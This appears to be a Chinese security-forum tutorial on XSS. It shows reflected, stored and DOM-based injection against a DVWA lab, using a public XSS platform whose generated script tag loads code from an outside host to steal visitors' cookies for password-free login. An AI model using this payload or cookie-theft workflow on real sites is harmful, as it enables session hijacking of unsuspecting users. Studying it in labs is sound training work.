安全矩阵

 找回密码
 立即注册
搜索
查看: 2239|回复: 0

HW常见攻击方式 --XSS跨站脚本攻击

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-23 22:28:45 | 显示全部楼层 |阅读模式
原文链接:HW常见攻击方式 --XSS跨站脚本攻击

后来,一杯酒能解决的事,也就不想再浪费眼泪了。。。

----  网易云热评

声明:
上周的福利,中奖者还没联系,截止到3月24日上午8点,若还未联系视为放弃,福利将通过微信群一群发送给幸运者。。。

一、XSS介绍

跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

二、XSS平台
1、注册登陆账号,没有百分之百的安全,仅供测试交流

https://xssaq.com/xss.php
2、新建项目

3、自动生成要插入的xss代码

<sCRiPt/SrC=https://xssaq.com/dGLM>

三、反射性xss
1、在存在xss漏洞的网站,插入上面生成的xss代码,点击submit


2、刷新xss平台,会发现有一条数据


3、知道了网址,也知道cookie,下面利用工具登录,不用输入账号密码,直接登录了dvwa平台

4、反射性xss是一次性的,也就是说,需要人去点击下面的链接,才能触发该漏洞

http://192.168.1.14/dvwa/vulnera ... ssaq.com%2FdGLM%3E#


四、存储型xss
1、在留言板输入上面生成xss代码



2、只要刷新一下该页面,xss平台就出现一条记录,也就是说只要有人看到该留言板,我们就能获取其cookie
3、利用工具登录
4、存储型xss漏洞,理论是永久的,只要有人浏览到你插入的代码,他的cookie信息就会被拿到。


五、DOM型XSS
1、点击select,发现url中有English,

2、修改url中english为aaa,发现插入了代码中,所以存在dom型xss注入

3、插入生成的xss代码,即可获取对方的cookie


六、工具下载:
1、公众号:回复20210323
2、视频号:私信





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 22:01 , Processed in 0.014272 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表